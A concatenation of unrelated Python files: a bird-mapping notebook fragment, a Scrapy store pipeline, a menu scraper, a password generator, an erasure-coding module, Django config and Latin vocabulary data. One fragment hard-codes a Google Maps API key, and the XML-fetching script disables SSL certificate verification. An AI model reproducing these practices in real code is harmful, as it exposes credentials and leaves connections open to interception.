df5 = pd.concat([df5.drop(['location'],axis=1), df5['location'].apply(pd.Series)],axis=1)
#Combining dataframes from the three origin points
frames = [df3,df5,df6]
df_keys = pd.concat(frames, ignore_index = True)
df_keys['id'].nunique() #To find how many unique birds we retrieved.
#Creating a JSON File (If needed)
with open("sample_json.json","a+") as write_file: #This command is used to append new data to existing file
    json.dump(json_data3, write_file, indent = 4)
with open("sample_json.json","w") as write_file: #This command just overwrites new data to existing file
    json.dump(json_data3, write_file, indent = 4)
#Mapping of birds on Google Maps (Works in Jupyter Notebook)
import gmaps
# NOTE(review): hard-coded Google Maps API key — rotate it and move to config.
gmaps.configure(api_key="AIzaSyDsWngN6Fn0rVOMClQqE21kkmhEG_z0vgM")
# NOTE(review): df4 is never defined anywhere in this file — this raises
# NameError; it most likely should be df_keys. Confirm intent.
locations = df4[['latitude','longitude']]
fig = gmaps.figure()
washington_coordinates = (38.899600,-77.04882)
|
9,521 | f66306908f1fdd5c662804e73596b445c66dc176 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
from sqlalchemy.orm.session import sessionmaker, query
from FoodPandaStore.FoodPandaStore.model import *
import datetime as dt
from datetime import datetime
class FoodpandastoreInfo2Pipeline:
    """Scrapy pipeline that upserts scraped Foodpanda stores (plus their
    tambon/district/province link rows and menus) into the database."""

    def __init__(self):
        engine = db_connect()
        create_tables(engine)
        # Session *factory*; a fresh session is created per processed item.
        self.session = sessionmaker(bind=engine)

    def process_item(self, item, spider):
        # NOTE(review): indentation reconstructed from a whitespace-mangled
        # source; the branch nesting below is the most plausible reading
        # (menus are only attached to brand-new stores) — confirm.
        session = self.session()
        # Candidate rows built up-front from the scraped item.
        new_store_info = FoodPandaStoreInfo2(
            id=item['id'],
            code=item['code'],
            category=item['category'],
            name=item['name'],
            url=item['url'],
            rating=item.get('rating', None),
            address=item['address'],
            latitude=item['latitude'],
            longitude=item['longitude'],
            is_pickup_available=item['is_pickup_available'],
            is_delivery_available=item['is_delivery_available'],
            is_active=item['is_active'],
            date=dt.datetime.utcnow()
        )
        new_ts = TambonStore(
            store_id=item['id'],
            sub_district_id=item['sub_district_id'],
            district_id=item['district_id'],
            province_id=item['province_id'],
            updated_datetime=datetime.utcnow())
        # Only persist stores whose tambon already exists in TambonGeo2.
        existing_tambon = session.query(TambonGeo2).filter_by(sub_district_id = item['sub_district_id'],
                                                              district_id=item['district_id'],
                                                              province_id=item['province_id']).first()
        if existing_tambon:
            ## Store
            existing_store_info = session.query(FoodPandaStoreInfo2).filter_by(id=item['id']).first()
            existing_tambon_store = session.query(TambonStore).filter_by(store_id=item['id'],
                                                                         sub_district_id=item['sub_district_id'],
                                                                         district_id=item['district_id'],
                                                                         province_id=item['province_id']).first()
            if existing_store_info:
                # Store already known: merge it and upsert its tambon link.
                session.merge(existing_store_info)
                if existing_tambon_store:
                    session.merge(new_ts)
                else:
                    session.add(new_ts)
            else:
                # Brand-new store: insert the store, its link and its menus.
                session.add(new_store_info)
                session.add(new_ts)
                menus = item.get('menus', [])
                for menu in menus:
                    m = FoodPandaStoreMenu2(
                        id=menu['id'],
                        name=menu['name'],
                        type=menu['type'],
                        opening_time=menu['opening_time'],
                        closing_time=menu['closing_time']
                    )
                    new_store_info.menus.append(m)
        else:
            print('{}, {}, {} is not persisted in TambonGeo'.format(item['sub_district_id'],
                                                                    item['district_id'],
                                                                    item['province_id']))
        session.commit()
        # NOTE(review): no rollback/close on exception, and the item is not
        # returned (Scrapy pipelines conventionally return it) — confirm.
        session.close()
9,522 | 02e40e051c19116c9cb3a903e738232dc8f5d026 |
from BeautifulSoup import BeautifulSoup, NavigableString
from urllib2 import urlopen
from time import ctime
import sys
import os
import re
restaurants = ["http://finweb.rit.edu/diningservices/brickcity",
"http://finweb.rit.edu/diningservices/commons",
"http://finweb.rit.edu/diningservices/crossroads",
"http://finweb.rit.edu/diningservices/gvcantinagrille",
"http://finweb.rit.edu/diningservices/gracies",
"http://finweb.rit.edu/diningservices/ritzsportszone"]
pretty_header = """
---------------------------------------------------
Parser Of On-campus Preferred Specials
a.k.a.
______ ______ ______ ______ _____
| _ | __ | __ | _ |/ ____|
| |_) | | | | | | | |_) | (___
| ___| | | | | | | ___|\___ \\
| | | |__| | |__| | | ____) |
| | | | | | | |
|__| |______|______|__| |_____/
It is currently {curtime}
---------------------------------------------------
[1] Brick City Cafe
[2] Commons
[3] Crossroads
[4] Global Village Cantina and Grille
[5] Gracies
[6] Ritz Sports Zone
[q] Quit
==================================================="""
def menu():
    """ Do all the heavy lifting.

    Interactive loop (Python 2): prompt for a restaurant, scrape its menu
    page with BeautifulSoup and print each meal section, until 'q' quits.
    """
    while True:
        # Loop till user quits.
        sel = 0
        while ( sel < 1 or sel > len(restaurants)):
            # Input validation
            print pretty_header.format(curtime=ctime())
            sel = raw_input("Enter your menu choice [1-6 or q]: ")
            if sel.lower() == "q":
                sys.exit(0)
            try:
                sel = int(sel)
            except:
                # Non-numeric input: keep prompting.
                sel = 0
        os.system("clear")
        # Load meals from desired restaurant.
        html = urlopen(restaurants[sel-1])
        soup = BeautifulSoup(html, convertEntities = BeautifulSoup.HTML_ENTITIES)
        # Page structure: one element per meal/tab with ids meal_N / tab_N.
        meals = soup.findAll(id=re.compile("meal_\d"))
        tabs = soup.findAll(id=re.compile("tab_\d"))
        # get the name of the restaurant, minus the "RIT Dining Services" bs.
        print ("\nOn the menu at " + re.sub("^[\w\W]*\s?:\s?", "",
               str(soup.title.string)) + " today is:")
        meal_num = 0
        for meal in meals:
            if meal:
                # print all meals served + meal name / subrestaurant name
                print ("=====================")
                print tabs[meal_num].contents[0].string
                print ("=====================\n")
                meal_num += 1
                for item in meal.findAll("li"):
                    if item.string and str(item.string) != "":
                        print item.string
        print ("\n")
        raw_input("Press any key to continue...")
        os.system("clear")
if sys.version[0] != "2":
print "This script uses BeautifulSoup for html parsing."
print "BeautifulSoup only supports Python 2.x"
menu()
|
9,523 | d3b0a1d8b9f800c5d34732f4701ea2183405e5b4 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 3 18:27:30 2020
@author: PREET MODH
"""
# For each test case: read 4*n-1 integer points, then print the x and the y
# value that each occur an odd number of times (presumably the corner missing
# from a set of axis-aligned rectangles — competitive-programming task).
for _ in range(int(input())):
    n=int(input())
    xco,yco=[],[]
    flagx,flagy,xans,yans=1,1,0,0
    for x in range(4*n-1):
        # NOTE: the loop variable x is shadowed by the parsed coordinate.
        x,y=input().split()
        xco.append(int(x))
        yco.append(int(y))
    xco.sort(),yco.sort()
    # Append a sentinel larger than any real value so the last run of equal
    # values is flushed by the comparison below.
    xco.append(xco[-1]+1),yco.append(yco[-1]+1)
    countx,county,i=1,1,0
    # Scan runs of equal sorted values; a run of odd length is the answer.
    while(i<len(xco)-1):
        if flagx==1:
            if xco[i]==xco[i+1]:
                countx+=1
            else:
                if countx%2!=0:
                    xans=xco[i]
                    flagx=0
                countx=1
        if flagy==1:
            if yco[i]==yco[i+1]:
                county+=1
            else:
                if county%2!=0:
                    yans=yco[i]
                    flagy=0
                county=1
        if flagx==0 and flagy==0:
            break
        i=i+1
    print(xans,yans,end=' ')
|
9,524 | f327f408ae2759407ac9f01ad4feff5c6a0845f1 | #Function to remove spaces in a string
def remove(string_input):
    """Return string_input with every ASCII space character deleted
    (tabs and other whitespace are left untouched)."""
    return "".join(string_input.split(" "))
|
9,525 | 3b8c4f19e28e54e651862ec9b88b091c9faff02b | import urllib.request, urllib.parse, urllib.error
from urllib.request import urlopen
import xml.etree.ElementTree as ET
import ssl
# Py4E assignment: fetch an XML comments feed and sum every <count> value.
# # Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

url = input('Enter a URL: ')
# if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_42.xml'
if len(url) < 1 : url = 'http://py4e-data.dr-chuck.net/comments_70857.xml'
# uh = urllib.request.urlopen(url)
# data = uh.read()
# print('Retrieved', len(data), 'characters')
# print(data.decode())
xml = urlopen(url, context=ctx).read()
print(len(xml))
stuff = ET.fromstring(xml)
# Each comment looks like <comment><name>..</name><count>..</count></comment>.
lst = stuff.findall('comments/comment')
print('Comment count:', len(lst))
tot = 0
# counts = stuff.findall('.//count')
# print(counts)
for item in lst:
    # print('Name', item.find('name').text)
    # print('Count', item.find('count').text)
    x = int(item.find('count').text)
    tot = tot + x
print(tot)
|
9,526 | 0c283cd31203291da24226a0eae781bd397e84d4 | '''
Generate a ten-character alphanumeric password with at least one lowercase,
at least one uppercase character, and at least three digits
'''
import secrets
import string
alphabets = string.ascii_letters + string.digits
# Keep drawing 10-character candidates until one satisfies the policy:
# at least one lowercase, at least one uppercase, at least three digits.
while True:
    password = "".join(secrets.choice(alphabets) for _ in range(10))
    has_lower = any(ch.islower() for ch in password)
    has_upper = any(ch.isupper() for ch in password)
    digit_count = sum(ch.isdigit() for ch in password)
    if has_lower and has_upper and digit_count >= 3:
        print(password)
        break
|
9,527 | 0ebd19079a16a6e3da34da2ecfda0d159b8580b2 | #!/usr/bin/python
#
# @name = 'fmsrutil.py'
#
# @description = "F-MSR utilities module."
#
# @author = ['YU Chiu Man', 'HU Yuchong', 'TANG Yang']
#
import sys
import os
import random
from finitefield import GF256int
from coeffvector import CoeffVector
from coeffvector import CoeffMatrix
import common
#Check if C library of F-MSR is installed:
import codings.clibfmsr.clibfmsr
useClibfmsr = True
def getNativeBlockNum(n, k):
    """Return the number of native (data) blocks for an (n, k) F-MSR code."""
    native = k * (n - k)
    return native
def getParityBlockNum(n, k):
    """Return the number of parity blocks for an (n, k) F-MSR code."""
    parity = n * (n - k)
    return parity
def getNodeIdList(n, k):
    """Return, per parity block, the id of the node that stores it.

    Parity blocks are laid out in segments of n-k consecutive blocks, one
    segment per node, so the result is [0]*(n-k) + [1]*(n-k) + ...
    """
    segment = n - k
    blocks = n * segment  # == getParityBlockNum(n, k), inlined
    return [node for node in range(blocks // segment) for _ in range(segment)]
def getParityCoeff(n, k):
    """Return the flattened GF(2^8) encoding matrix: row i holds the
    coefficients (i+1)^j for native block j, rows concatenated in order."""
    native = getNativeBlockNum(n, k)
    parity = getParityBlockNum(n, k)
    return [GF256int(row + 1) ** col
            for row in range(parity)
            for col in range(native)]
def encode(n, k, src, parityCoeff, setting, metadata):
    '''Encode src file to parity chunks.

    Reads the whole source file, pads it to a multiple of the native block
    count, runs the C encoding routine, and writes one "big-chunk" file per
    storage node (the concatenation of that node's parity chunks). All
    chunk/node bookkeeping is recorded in `metadata` (mutated in place).
    Python 2 code: file contents are byte strings ('' / '\\0' / chr()).
    '''
    nativeBlockNum = getNativeBlockNum(n, k)
    parityBlockNum = getParityBlockNum(n, k)
    infile = open(src, 'rb')
    indatalist = infile.read()
    infile.close()
    totalchunk = nativeBlockNum
    filesize = len(indatalist)
    #Generate info for big-chunk:
    for i in range(metadata.totalnode):
        fileNode = common.FileNodeMetadata(i)
        fileNode.nodekey = setting.nodeInfo[i].nodekey
        fileNode.nodetype = setting.nodeInfo[i].nodetype
        fileNode.bucketname = setting.nodeInfo[i].bucketname
        fileNode.bigchunksize = 0
        fileNode.chunknum = 0
        metadata.fileNodeInfo.append(fileNode)
    #Encode indatalist to outdatalist
    if filesize > 0:
        # Pad the input to totalchunk equal-size chunks (+1 so it never
        # rounds to zero), then hand the flat coefficient string to C.
        chunksize = filesize/totalchunk + 1
        indatalist += '\0'*(chunksize*totalchunk - filesize)
        parityCoeff_temp = ''.join([chr(parity) for parity in parityCoeff])
        outdatalist = codings.clibfmsr.clibfmsr.encodeComputation(indatalist, \
                parityCoeff_temp, nativeBlockNum, parityBlockNum, chunksize)
    else:
        # Zero-byte file: no computation, all chunks are empty.
        chunksize = 0
    #Generate info for small chunks:
    nodeIdList = getNodeIdList(n, k)
    for i in range(parityBlockNum):
        chunk = common.ChunkMetadata(i)
        chunk.chunkname = metadata.filename + '.chunk' + str(i)
        chunk.chunksize = chunksize
        chunk.chunktype = 'parity'
        chunk.chunkpath = setting.chunkdir + '/' + chunk.chunkname
        nodeid = nodeIdList[i]
        chunk.nodeid = nodeid
        chunk.nodekey = setting.nodeInfo[nodeid].nodekey
        chunk.nodetype = setting.nodeInfo[nodeid].nodetype
        chunk.bucketname = setting.nodeInfo[nodeid].bucketname
        chunk.action = 'upload'
        #Add chunk position inside big-chunk:
        chunk.position = metadata.fileNodeInfo[nodeid].chunknum
        metadata.chunkInfo.append(chunk)
        #Add support for big-chunk:
        metadata.fileNodeInfo[nodeid].bigchunksize += chunk.chunksize
        metadata.fileNodeInfo[nodeid].chunknum += 1
    metadata.totalchunk = parityBlockNum
    metadata.parityCoeff = parityCoeff[:]
    #Generate big-chunks:
    startchunk = 0
    writelen = 1048576   # stream output in 1 MiB slices
    for i in range(metadata.totalnode):
        dest = setting.chunkdir + '/' + metadata.filename + '.node' + str(i)
        if chunksize > 0:
            f = open(dest, 'wb')
            numchunks = nodeIdList.count(i)
            writenext = startchunk*chunksize
            # Copy this node's contiguous span of outdatalist in 1 MiB steps,
            # then flush whatever remains past the last full slice.
            for j in range(startchunk*chunksize, (startchunk+numchunks)*chunksize-writelen, writelen):
                writenext = j+writelen
                f.write(outdatalist[j:writenext])
            f.write(outdatalist[writenext:(startchunk+numchunks)*chunksize])
            f.close()
            startchunk += numchunks
        else:
            # Empty source: still create an empty big-chunk placeholder.
            open(dest, 'wb').close()
        metadata.fileNodeInfo[i].bigchunkpath = dest
        metadata.fileNodeInfo[i].bigchunkname = metadata.filename + '.node' + str(i)
        metadata.fileNodeInfo[i].action = 'upload'
def reversematrix(n, k, gj_matrix):
    '''Reverse matrix.

    In-place Gauss-Jordan elimination over GF(2^8) on the augmented matrix
    gj_matrix = [decoding | identity] (nativeBlockNum rows, 2*nativeBlockNum
    columns). On return the right half holds the inverse of the left half.
    '''
    ## The first elimination: decoding matrix -> lower unit triangular matrix
    nativeBlockNum = getNativeBlockNum(n, k)
    parityBlockNum = getParityBlockNum(n, k)
    for rowNo in range(nativeBlockNum):
        ##1.find the rowNo row vector with 1st-coeff of valve non-zero
        A = GF256int(0)
        for i in range(rowNo,nativeBlockNum,1):
            if gj_matrix[i][rowNo]!=0:
                A = gj_matrix[i][rowNo]
                break
        # NOTE(review): if no pivot is found (singular matrix), `i` keeps its
        # last loop value and A stays 0, so the division below would fail —
        # callers are assumed to pass invertible matrices.
        ##2. permutation between the rowNo row vector and the ith row vector
        temp_vector = [GF256int(0)]*(nativeBlockNum*2)
        if i!= rowNo:
            for j in range(nativeBlockNum*2):
                temp_vector[j] = gj_matrix[i][j]
                gj_matrix[i][j] = gj_matrix[rowNo][j]
                gj_matrix[rowNo][j] = temp_vector[j]
        ##3. in rowNo-th row vector, all the coeffs/1st coeff
        for m in range(nativeBlockNum*2):
            gj_matrix[rowNo][m] = gj_matrix[rowNo][m]/A
        ##4. The row vectors below rowNo-th row vector eliminate the rowNo-th coeff
        for j in range(rowNo+1,nativeBlockNum,1):
            B = gj_matrix[j][rowNo]
            for m in range(rowNo,nativeBlockNum*2,1):
                gj_matrix[j][m] = gj_matrix[j][m] - gj_matrix[rowNo][m]*B
    # The second elimination: decoding matrix -> unit matrix
    ##5. The row vectors above rowNo-th row vector eliminate the rowNo-th coeff
    for rowNo in range(nativeBlockNum-1,0,-1):
        for j in range(0,rowNo,1):
            C = gj_matrix[j][rowNo]
            for m in range(nativeBlockNum*2):
                gj_matrix[j][m] = gj_matrix[j][m] - gj_matrix[rowNo][m]*C
def decode(n, k, src, blocknums, parityCoeff, dest, filesize, setting):
    '''Decode chunk files to dest file.

    src: paths of the selected parity chunk files; blocknums: which parity
    blocks those chunks are. Rebuilds the native data by inverting the
    selected rows of the encoding matrix over GF(2^8), feeding the inverse
    to the C decoding routine, and writing `filesize` bytes to dest.
    '''
    ## special handling for 0B files
    if filesize <= 0:
        open(dest,'wb').close()
        return
    cv_temp=[]
    nativeBlockNum = getNativeBlockNum(n, k)
    parityBlockNum = getParityBlockNum(n, k)
    enc_matrix = [[GF256int(0) for col in range(nativeBlockNum)] for row in range(parityBlockNum)]
    dec_matrix = [[GF256int(0) for col in range(nativeBlockNum)] for row in range(nativeBlockNum)]
    rev_matrix = [[GF256int(0) for col in range(nativeBlockNum)] for row in range(nativeBlockNum)]
    gj_matrix = [[GF256int(0) for col in range(nativeBlockNum*2)] for row in range(nativeBlockNum)]
    ## generate the encoding matrix
    counter = 0
    for i in range(parityBlockNum):
        for j in range(nativeBlockNum):
            enc_matrix[i][j] = GF256int(parityCoeff[counter])
            counter += 1
    # cm1 collects every encoding row as a CoeffVector (rank bookkeeping).
    cm1 = CoeffMatrix(nativeBlockNum)
    for i in range(parityBlockNum):
        cv_temp.append(CoeffVector(nativeBlockNum))
        for j in range(nativeBlockNum):
            cv_temp[i].coeff_[j] = enc_matrix[i][j]
        cv_temp[i].first()
        cm1.addcoeffvector(cv_temp[i])
    ## generate the decoding matrix (the rows of the selected chunks)
    i=0
    for selectChunkNo in blocknums:
        for j in range(nativeBlockNum):
            dec_matrix[i][j]=enc_matrix[selectChunkNo][j]
        i += 1
    ## initialize the reverse matrix (identity)
    for i in range(nativeBlockNum):
        for j in range(nativeBlockNum):
            if j==i:
                rev_matrix[i][j]= GF256int(1)
    ## initialize the Gauss-Jordan matrix = [decoding,reverse]
    for i in range(nativeBlockNum):
        for j in range(nativeBlockNum*2):
            if j<nativeBlockNum:
                gj_matrix[i][j]= dec_matrix[i][j]
            else:
                gj_matrix[i][j]= rev_matrix[i][j-nativeBlockNum]
    reversematrix(n, k, gj_matrix)
    # After elimination the right half of gj_matrix is dec_matrix^-1.
    for i in range(nativeBlockNum):
        for j in range(nativeBlockNum):
            dec_matrix[i][j] = gj_matrix[i][j+nativeBlockNum]
    ##generate decode data chunks
    selectchunk=[]
    for filename in src:
        infile = open(filename,'rb')
        selectchunk.append(infile.read())
        infile.close()
    # All chunks share the size of the first one.
    chunksize = os.path.getsize(src[0])
    indatalist = ''.join(selectchunk)
    ##rebuild the original chunks (flatten the inverse into a byte string)
    parityCoeff_temp = ''.join([chr(dec_matrix[i][j]) \
        for i in range(nativeBlockNum) \
        for j in range(nativeBlockNum)])
    outdatalist = codings.clibfmsr.clibfmsr.decodeComputation(indatalist, \
        parityCoeff_temp, nativeBlockNum, chunksize)
    # Write the decoded payload in 1 MiB slices, truncated to filesize
    # (drops the zero padding added by encode()).
    outfile = open(dest,'wb')
    writelen = 1048576
    writenext = 0
    for i in range(0,filesize-writelen,writelen):
        writenext = i+writelen
        outfile.write(outdatalist[i:writenext])
    outfile.write(outdatalist[writenext:filesize])
    outfile.close()
def getCheckNum(parityBlockNum):
    '''Get check number for checking strong MDS, for fmsr(k=n-2) only.

    Number of distinct pairs among the surviving parityBlockNum-2 blocks,
    minus the (parityBlockNum/2 - 1) pairs excluded by the scheme.
    '''
    survivors = parityBlockNum - 2
    return int(survivors * (survivors - 1) / 2 - ((parityBlockNum / 2) - 1))
def getStrongMDSPropertyDegree(repairNodeno, nativeBlockNum, parityBlockNum, checkNum, enc_matrix):
    '''Get strong MDS property degree for one repaired node.

    Counts, over every unordered pair of surviving parity blocks that is
    excluded, how many of the remaining coefficient-vector sets still have
    full rank (== nativeBlockNum).  For fmsr(k=n-2) only.
    '''
    degree = 0
    survivors = []
    # Collect coefficient vectors of every parity block NOT stored on the
    # node being repaired (each node holds two consecutive blocks).
    for blk in range(parityBlockNum):
        if int(blk / 2) == repairNodeno:
            continue
        cv = CoeffVector(nativeBlockNum)
        for col in range(nativeBlockNum):
            cv.coeff_[col] = enc_matrix[blk][col]
        cv.first()
        survivors.append(cv)
    total = parityBlockNum - 2
    combos = 0
    # For every unordered pair (a, b) of survivors, check whether the
    # matrix built from the other total-2 vectors spans the native space.
    for a in range(total):
        for b in range(a + 1, total):
            cm = CoeffMatrix(nativeBlockNum)
            for idx in range(total):
                if idx != a and idx != b:
                    cm.addcoeffvector(survivors[idx].copy())
            if cm.rank_ == nativeBlockNum:
                degree += 1
            combos += 1
    return degree
def checkMDS(MSR_n, MSR_k, enc_matrix):
    '''Check MDS property, for fmsr(k=n-2) only.

    Returns True when, for every unordered pair of failed nodes, the
    parity blocks of the remaining n-2 nodes form a full-rank matrix.
    '''
    nativeBlockNum = getNativeBlockNum(MSR_n, MSR_k)
    parityBlockNum = getParityBlockNum(MSR_n, MSR_k)
    # One coefficient vector per parity block.
    vectors = []
    for row in range(parityBlockNum):
        cv = CoeffVector(nativeBlockNum)
        for col in range(nativeBlockNum):
            cv.coeff_[col] = enc_matrix[row][col]
        cv.first()
        vectors.append(cv)
    # Number of ways to pick the n-2 surviving nodes (= pairs of failures).
    pairTotal = int(MSR_n * (MSR_n - 1) / 2)
    matrices = [CoeffMatrix(nativeBlockNum) for _ in range(pairTotal)]
    isMDS = True
    idx = 0
    for a in range(MSR_n):
        for b in range(a + 1, MSR_n):
            # Feed both parity blocks of every surviving node.
            for node in range(MSR_n):
                if node != a and node != b:
                    matrices[idx].addcoeffvector(vectors[node * 2].copy())
                    matrices[idx].addcoeffvector(vectors[node * 2 + 1].copy())
            if matrices[idx].rank_ != nativeBlockNum:
                isMDS = False
            idx += 1
    return isMDS
def checkstongMDS(n, k, nativeBlockNum, parityBlockNum, enc_matrix):
    '''Check strong MDS property, for fmsr(k=n-2) only.

    Returns the list of strong-MDS property degrees, one per node.
    '''
    # Check-combination count (forwarded to the per-node degree helper).
    checkNum = getCheckNum(parityBlockNum)
    return [getStrongMDSPropertyDegree(node, nativeBlockNum, parityBlockNum,
                                       checkNum, enc_matrix)
            for node in range(n)]
def testStrongMDSProperty(strongMDSPropertyDegrees, checkNum,n):
'''Decide whether the current parity coefficient set passes the strong MDS property.'''
result = True
#threshold = checkNum
threshold = 2*(n-1)*(n-2)-(n-2)*(n-3)/2
#Important: currently the threshold value is hardcode
for degree in strongMDSPropertyDegrees:
if degree < threshold:
result = False
return result
def functionalRepair(n, k, src, blocknums, failedNode, parityCoeff, repairChunks, setting, metadata):
    '''Functional repair by generating new parity chunks.

    Reads the surviving chunks listed in src, runs the native repair
    computation, republishes the encoding matrix from metadata through the
    flat parityCoeff list (mutated in place), and writes one new big-chunk
    file per unhealthy node, updating that node's metadata.fileNodeInfo
    entry for upload.

    NOTE(review): blocknums, failedNode and repairChunks are not used in
    this body; setting/metadata are project objects, so the field
    semantics below are inferred from usage -- verify against callers.
    '''
    nativeBlockNum = getNativeBlockNum(n, k)
    parityBlockNum = getParityBlockNum(n, k)
    checkNum = getCheckNum(parityBlockNum)  # computed but not used below
    ## read the encoding matrix and repair
    enc_matrix = metadata.enc_matrix
    repairCodingCoeff = metadata.repairCodingCoeff
    # Slurp every surviving source chunk fully into memory.
    indatalist = []
    for filepath in src:
        infile = open(filepath, 'rb')
        indatalist.append(infile.read())
        infile.close()
    # All source chunks are assumed to share the size of the first one.
    chunksize = os.path.getsize(src[0])
    if chunksize > 0:
        #Repair computation:
        # Flatten chunk data and the (n-k) x (n-1) repair coefficients into
        # strings (one byte per coefficient) for the C repair routine.
        indatalist_temp = ''.join(indatalist)
        parityCoeff_temp = []
        for i in range(n-k):
            for j in range(n-1):
                parityCoeff_temp.append(chr(repairCodingCoeff[i][j]))
        parityCoeff_temp = ''.join(parityCoeff_temp)
        outdatalist = codings.clibfmsr.clibfmsr.repairComputation(indatalist_temp, \
                parityCoeff_temp, n, k, chunksize)
    # Copy the encoding matrix row-major into the caller-visible flat
    # parityCoeff list (in-place mutation is the output channel here).
    counter = 0
    for i in range(parityBlockNum):
        for j in range(nativeBlockNum):
            parityCoeff[counter] = enc_matrix[i][j]
            counter += 1
    #Add support for big-chunk:
    writelen = 1048576  # stream output in 1 MiB slices
    # NOTE(review): writenext carries over between unhealthy nodes; this
    # relies on every node having the same filesize -- confirm.
    writenext = 0
    for i in range(metadata.totalnode):
        if setting.nodeInfo[i].healthy == False:
            dest = setting.chunkdir + '/' + metadata.filename + '.node' + str(i)
            filesize = metadata.fileNodeInfo[i].bigchunksize
            if chunksize <= 0:
                # Nothing was computed: leave an empty placeholder chunk.
                open(dest,'wb').close()
            else:
                # Write full 1 MiB slices, then the final partial slice
                # up to filesize.
                outfile = open(dest, 'wb')
                for j in range(0,filesize-writelen,writelen):
                    writenext = j+writelen
                    outfile.write(outdatalist[j:writenext])
                outfile.write(outdatalist[writenext:filesize])
                outfile.close()
            # Record the regenerated chunk so it gets uploaded.
            metadata.fileNodeInfo[i].bigchunkpath = dest
            metadata.fileNodeInfo[i].bigchunkname = metadata.filename + '.node' + str(i)
            metadata.fileNodeInfo[i].action = 'upload'
|
9,528 | 65ea27851d9db0f0a06d42bd37eff633d22a1548 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-30 14:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: alter Book.subtitle and Book.title.

    Makes ``subtitle`` optional with example help text, and marks
    ``title`` as indexed and unique with example help text.
    """

    dependencies = [
        ('books', '0007_auto_20170127_2254'),
    ]

    operations = [
        # subtitle: optional free-text field
        migrations.AlterField(
            model_name='book',
            name='subtitle',
            field=models.CharField(blank=True, help_text='e.g. There and Back Again', max_length=200),
        ),
        # title: required, indexed, and unique across all books
        migrations.AlterField(
            model_name='book',
            name='title',
            field=models.CharField(db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=True),
        ),
    ]
|
9,529 | aac334256c1e05ef33a54da19925911af6645a10 | from django.urls import path
from .authentication import GetToken, RegisterUserAPIView
from .resurses import *
# URL routing table for the card API.
urlpatterns = [
    # authentication
    path('register/', RegisterUserAPIView.as_view()),
    path('get/token/', GetToken.as_view()),
    # card collection endpoints
    path('card/list/', ShowCardsAPIView.as_view()),
    path('card/create/', CreateCardAPIView.as_view()),
    # per-card operations, keyed by primary key
    path('card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()),
    path('card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()),
    path('card/<int:pk>/delete/', DeleteCardAPIView.as_view()),
    path('card/<int:pk>/update/', UpdateCardAPIView.as_view()),
    # filtered card retrieval
    path('card/get/', GetCardSListAPIView.as_view()),
]
|
9,530 | 8a0c0f5ca6a965e07f59a6c88d4dd335310cbdfc | import text
# Sentinel used by the generated vocabulary data for missing values.
nan=""
# Map from textbook section label ('1.1' .. '2.15') to the index of that
# section's last vocabulary entry in the_text; 'start'/'end' are sentinel
# markers (-1/-2), not real indices.
section_words = {'start': -1, '1.1': 17, '1.2': 38, '1.3': 55, '1.4': 76, '1.5': 95, '1.6': 114, '1.7': 133, '1.8': 151, '1.9': 170, '1.10': 190, '1.11': 209, '1.12': 233, '1.13': 257, '1.14': 277, '1.15': 299, '1.16': 320, '1.17': 341, '1.18': 364, '1.19': 385, '1.20': 405, '1.21': 428, '2.1': 451, '2.2': 474, '2.3': 495, '2.4': 521, '2.5': 542, '2.6': 564, '2.7': 587, '2.8': 611, '2.9': 633, '2.10': 653, '2.11': 674, '2.12': 695, '2.13': 718, '2.14': 740, '2.15': 760, 'end': -2}
the_text = [('AGRICOLA', 0, 'agricola', 'farmer', '', '1_1', 1), ('AMBVLO', 1, 'ambulo', 'to walk', '', '1_1', 2), ('AMO', 2, 'amo', 'to love', '', '1_1', 2), ('AQVA', 3, 'aqua', 'water', '', '1_1', 1), ('ATHLETA', 4, 'athleta', 'athlete', '', '1_1', 1), ('BENE', 5, 'bene', 'well', '', '1_1', 1), ('CVRO', 6, 'curo', 'to take care for/of', '', '1_1', 2), ('ET/2', 7, 'et', 'and', '', '1_1', 1), ('FILIA', 8, 'filia', 'daughter', '', '1_1', 1), ('ITAQVE', 9, 'itaque', 'and so', '', '1_1', 1), ('LVPA', 10, 'lupa', 'she–wolf', '', '1_1', 1), ('NAVTA', 11, 'nauta', 'sailor', '', '1_1', 1), ('POETA', 12, 'poeta', 'poet', '', '1_1', 1), ('POSTEA', 13, 'postea', 'afterwards', '', '1_1', 1), ('PVELLA', 14, 'puella', 'girl', '', '1_1', 1), ('ROMA/N', 15, 'Roma', 'Rome', '', '1_1', 1), ('SVM/1', 16, 'sum', 'to be', '', '1_1', 3), ('TERRA', 17, 'terra', 'land', '', '1_1', 1), ('AMBVLO', 18, 'ambulo', 'to walk', '', '1_2', 2), ('AMO', 19, 'amo', 'to love', '', '1_2', 2), ('CVRO', 20, 'curo', 'to take care for/of', '', '1_2', 2), ('SVM/1', 21, 'sum', 'to be', '', '1_2', 3), ('DEBEO', 22, 'debeo', 'ought, must, should; to owe', '', '1_2', 1), ('DIV', 23, 'diu', 'for a long time', '', '1_2', 1), ('EGO', 24, 'ego', 'I', '', '1_2', 3), ('EXSPECTO', 25, 'exspecto', 'to wait for, await, expect', '', '1_2', 1), ('FABVLA/1', 26, 'fabula', 'story', '', '1_2', 1), ('FORMA', 27, 'forma', 'form,appearance', '', '1_2', 1), ('HABEO', 28, 'habeo', 'to have', '', '1_2', 1), ('HABITO', 29, 'habito', 'to live, dwell', '', '1_2', 1), ('NARRO', 30, 'narro', 'to tell', '', '1_2', 1), ('NON', 31, 'non', 'not', '', '1_2', 1), ('NVNC', 32, 'nunc', 'now', '', '1_2', 1), ('PARO/2', 33, 'paro', 'to prepare, get ready, design', '', '1_2', 2), ('PATRIA', 34, 'patria', 'fatherland', '', '1_2', 1), ('TENEO', 35, 'teneo', 'to hold', '', '1_2', 1), ('TV', 36, 'tu', 'you', '', '1_2', 3), ('VIDEO', 37, 'video', 'to see', '', '1_2', 1), ('VOCO', 38, 'voco', 'to call', '', '1_2', 1), ('EGO', 39, 'ego', 'I', '', 
